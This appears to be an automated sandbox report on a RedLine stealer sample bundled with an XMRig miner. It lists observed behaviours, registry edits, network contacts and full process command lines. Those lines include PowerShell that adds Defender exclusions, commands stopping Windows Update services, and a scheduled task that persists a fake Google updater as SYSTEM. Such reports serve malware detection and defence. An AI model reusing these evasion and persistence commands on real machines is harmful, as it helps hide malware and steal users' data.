Analysis Overview
SHA256
410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425
Threat Level: Known bad
The file 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp was found to be: Known bad.
Malicious Activity Summary
RedLine
Redline family
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
XMRig Miner payload
Downloads MZ/PE file
Drops file in Drivers directory
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Themida packer
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Modifies data under HKEY_USERS
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-12 08:45
Signatures
Redline family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-12 08:45
Reported
2023-08-12 08:47
Platform
win7-20230712-en
Max time kernel
52s
Max time network
148s
Command Line
Signatures
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1984 set thread context of 1976 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Temp\setup.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe
"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"
C:\Users\Admin\AppData\Local\Temp\mi.exe
"C:\Users\Admin\AppData\Local\Temp\mi.exe"
C:\Users\Admin\AppData\Local\Temp\cli.exe
"C:\Users\Admin\AppData\Local\Temp\cli.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\cc.exe
"C:\Users\Admin\AppData\Local\Temp\cc.exe"
C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 108
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=10094 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7feefa89758,0x7feefa89768,0x7feefa89778
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1092 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=832 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:2
C:\Windows\system32\taskeng.exe
taskeng.exe {4D283B43-C452-426D-BE22-A40709CCA62C} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=10094 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2436 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1932 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2588 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2704 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| PL | 51.83.170.21:19447 | tcp | |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.121.70:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:80 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| DE | 172.217.23.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.250.179.150:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 142.250.179.150:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
